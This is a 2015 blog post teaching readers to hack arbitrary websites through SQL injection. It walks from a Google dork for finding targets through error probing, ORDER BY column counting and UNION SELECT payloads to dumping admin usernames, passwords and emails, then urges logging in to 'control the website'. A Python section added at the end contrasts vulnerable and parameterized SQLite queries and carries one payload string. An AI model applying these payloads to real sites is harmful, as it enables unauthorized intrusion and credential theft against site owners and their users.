Sunday, April 19, 2015


Hack a website By Checking Vulnerability And Simple SQL Injection

First of all, open Google and search for this dork:
  inurl:.php?id=
You will see hundreds of websites with this URL format:
  www.site.com/anything.php?id=86
          (there may be any number in place of 86)



Open any link. The site may look like this:
  www.site.com/index.php?id=5

Let's see whether it is vulnerable or not. Type ' after id=5

The site will be like this:

www.site.com/index.php?id=5'

If it gives any SQL error, it means it is vulnerable to SQL injection and we can hack it.

Now we find the number of columns using the ORDER BY clause:

id=5 order by 1--

id=5 order by 2--

Carry on increasing the number after ORDER BY.

Now suppose you get an error or a message on ORDER BY 6-- such as "Unknown column in order clause".

Then it is clear that the query has 5 columns.
Now let's find the vulnerable column, the one that will display the result of our own queries.
For this we use UNION ALL SELECT followed by the series of column numbers--
such as UNION SELECT 1,2,3,4,5--
Just write this and put a hyphen (-), i.e. a minus sign, after id= (e.g. id=-5):
id=-5 union all select 1,2,3,4,5--
After pressing Enter the new page will show you a number between 1 and 5.
Suppose you see 2 somewhere on the screen: it means the 2nd column is vulnerable and we can insert our queries in this column.

Find its database version
Replace 2 with @@version or version() in your query:
id=5 union all select 1,@@version,3,4,5--
It will show you the database version on the screen. Note that if you see version 5 or greater, the next steps are easy; but if you see a version less than 5 (i.e. 4), we have to guess the names of tables and columns, which is very difficult.
Let's talk about version 5 or greater.
Write this:
id=5 union all select 1,group_concat(table_name),3,4,5 from information_schema.tables where table_schema=database()--


It will show you all the tables of the database.

Now look for a table named admin or user, because from these tables we can get the admin passwords and hack the website...

id=5 union all select 1,group_concat(column_name),3,4,5 from information_schema.columns where table_name='admin'--

It will show all the columns of the table admin, such as username, password and email.

Now the final step. We will extract the information stored in these columns:
id=5 union all select 1,group_concat(Username,0x3a,Password,0x3a,Email),3,4,5 from admin--
It will show the username, password and email of the admin.
Now find the admin panel, log in and control the website. Have fun :)
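As an added illustration (not code from the post), here is the PHP/MySQL pattern the post probes, rebuilt in Python against a constructed in-memory SQLite database: the string-concatenated lookup beside a parameterized one and a type-validated one, showing why the ' probe and the UNION payload only work against the first. Table and column names are made up to mirror the post.

```python
import sqlite3

# Constructed stand-in for the site in the post: a news table queried by
# ?id= and an admin table with the columns the post's payload reads.
def make_db():
    conn = sqlite3.connect(":memory:")
    conn.executescript("""
        CREATE TABLE news(id INTEGER, title TEXT, body TEXT);
        INSERT INTO news VALUES (5, 'Hello', 'world');
        CREATE TABLE admin(Username TEXT, Password TEXT, Email TEXT);
        INSERT INTO admin VALUES ('admin', 'hunter2', 'admin@example.com');
    """)
    return conn

def lookup_vulnerable(conn, user_id):
    """anything.php?id= done wrong: the raw parameter is spliced into the
    SQL text, so a stray ' raises an error and UNION rewrites the query."""
    sql = "SELECT title, body FROM news WHERE id=" + user_id
    return conn.execute(sql).fetchall()

def lookup_parameterized(conn, user_id):
    """Bound parameter: the value is data, never parsed as SQL, so the
    UNION payload is just compared against id and matches no row."""
    sql = "SELECT title, body FROM news WHERE id=?"
    return conn.execute(sql, (user_id,)).fetchall()

def lookup_hardened(conn, user_id):
    """Validate the type first, then bind: non-integer ids are rejected
    before any SQL runs, so no database error can leak to the page."""
    try:
        id_int = int(user_id)
    except ValueError:
        return None  # caller answers HTTP 400 instead of an SQL error
    sql = "SELECT title, body FROM news WHERE id=?"
    return conn.execute(sql, (id_int,)).fetchall()

def leaks_sql_error(conn, user_id):
    """True if the vulnerable lookup surfaces a database error for this
    input, i.e. the signal the post's ' probe is looking for."""
    try:
        lookup_vulnerable(conn, user_id)
        return False
    except sqlite3.Error:
        return True

if __name__ == "__main__":
    db = make_db()
    payload = "-5 union all select Username, Password from admin--"
    print(lookup_vulnerable(db, payload), lookup_parameterized(db, payload))
    print(lookup_hardened(db, payload), leaks_sql_error(db, "5'"))
```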
If you have any problem in any step feel free to ask.
If you Like it please share.
Thanks all.
